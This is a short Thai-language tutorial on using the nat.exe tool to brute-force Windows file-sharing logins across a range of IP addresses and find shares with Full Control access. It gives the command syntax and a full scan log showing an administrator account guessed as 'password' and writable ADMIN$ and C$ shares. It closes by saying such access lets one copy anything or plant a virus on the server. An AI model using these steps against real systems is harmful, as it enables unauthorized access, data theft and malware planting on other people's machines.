การใช้ NAT เจาะ Share Harddisk เปิดการควบคุมแบบ Full Control
ต่อจากบทที่แล้ว เราจะทำยังไงให้สามารถค้นหา Share แบบ Full Control ได้ เราสามารถใช้ nat.exe มาเพื่อหา Full Control ได้แต่ก่อนอื่นกรุณาดูรูปแบบคำสั่งของ nat เสียก่อน
nat -o output.file -u userlist.file -p passlist.file address
-o คือแสดง output ที่เกิดจากการ scan หา share เก็บไว้ที่ไฟล์ output.file
-u ชื่อ user เพื่อใช้ในการเปิด Share
-p password เพื่อใช้ในการเปิด Share
nat -o output.txt -u user.txt -p pass.txt 203.73.131.10-203.73.131.30
หา Share แบบ Full Control ตั้งแต่ 203.73.131.10 จนถึง 30 และใช้ user.txt กับ pass.txt ในการเปิด โดยให้ output ข้อมูลที่ได้ไปเก็บไว้ที่ไฟล์ output.exe [*]--- Reading usernames from userlist.txt [*]--- Reading passwords from passlist.txt[*]--- Checking host: 204.73.131.11 [*]--- Obtaining list of remote NetBIOS names[*]--- Attempting to connect with name: *[*]--- Unable to connect [*]--- Attempting to connect with name: *SMBSERVER [*]--- CONNECTED with name: *SMBSERVER [*]--- Attempting to connect with protocol: MICROSOFT NETWORKS 1.03 [*]--- Server time is Mon Dec 01 07:44:34 1997 [*]--- Timezone is UTC-6.0 [*]--- Remote server wants us to encrypt, telling it not to [*]--- Attempting to connect with name: *SMBSERVER [*]--- CONNECTED with name: *SMBSERVER [*]--- Attempting to establish session [*]--- Was not able to establish session with no password [*]--- Attempting to connect with Username: `ADMINISTRATOR' Password: `password' [*]--- CONNECTED: Username: `ADMINISTRATOR' Password: `password' [*]--- Obtained server information: Server=[BACKUP] User=[] Workgroup=[SITE] Domain=[] [*]--- Obtained listing of shares: Sharename Type Comment --------- ---- -------
ADMIN$ Disk: Remote Admin
C$ Disk: Default share
IPC$ IPC: Remote IPC
NETLOGON Disk: Logon server share Test Disk: [*]--- This machine has a browse list:
Server Comment
--------- -------
BACKUP [*]--- Attempting to access share: \*SMBSERVER [*]--- Unable to access [*]--- Attempting to access share: \*SMBSERVERADMIN$[*]--- WARNING: Able to access share: \*SMBSERVERADMIN$ [*]--- Checking write access in: \*SMBSERVERADMIN$ [*]--- WARNING: Directory is writeable: \*SMBSERVERADMIN$ [*]--- Attempting to exercise .. bug on: \*SMBSERVERADMIN$ [*]--- Attempting to access share: \*SMBSERVERC$ [*]--- WARNING: Able to access share: \*SMBSERVERC$ [*]--- Checking write access in: \*SMBSERVERC$ [*]--- WARNING: Directory is writeable: \*SMBSERVERC$ [*]--- Attempting to exercise .. bug on: \*SMBSERVERC$[*]--- Attempting to access share: \*SMBSERVERNETLOGON [*]--- WARNING: Able to access share: \*SMBSERVERNETLOGON [*]--- Checking write access in: \*SMBSERVERNETLOGON [*]--- Attempting to exercise .. bug on: \*SMBSERVERNETLOGON [*]--- Attempting to access share: \*SMBSERVERTest [*]--- WARNING: Able to access share: \*SMBSERVERTest[*]--- Checking write access in: \*SMBSERVERTest [*]--- Attempting to exercise .. bug on: \*SMBSERVERTest[*]--- Attempting to access share: \*SMBSERVERD$ [*]--- Unable to access [*]--- Attempting to access share: \*SMBSERVERROOT [*]--- Unable to access [*]--- Attempting to access share: \*SMBSERVERWINNT$[*]--- Unable to access
ถ้าหากว่าคุณพบ Share แบบ Control Full คุณก็จะสามารถ copy หรือจะทำยังไงก็ได้ แม้แต่เอา Virus ไปฝั่งไว้บน Server

กรุณาอ่านหนังสือ Windows NT เพื่อทำความเข้าใจเพิ่มเติม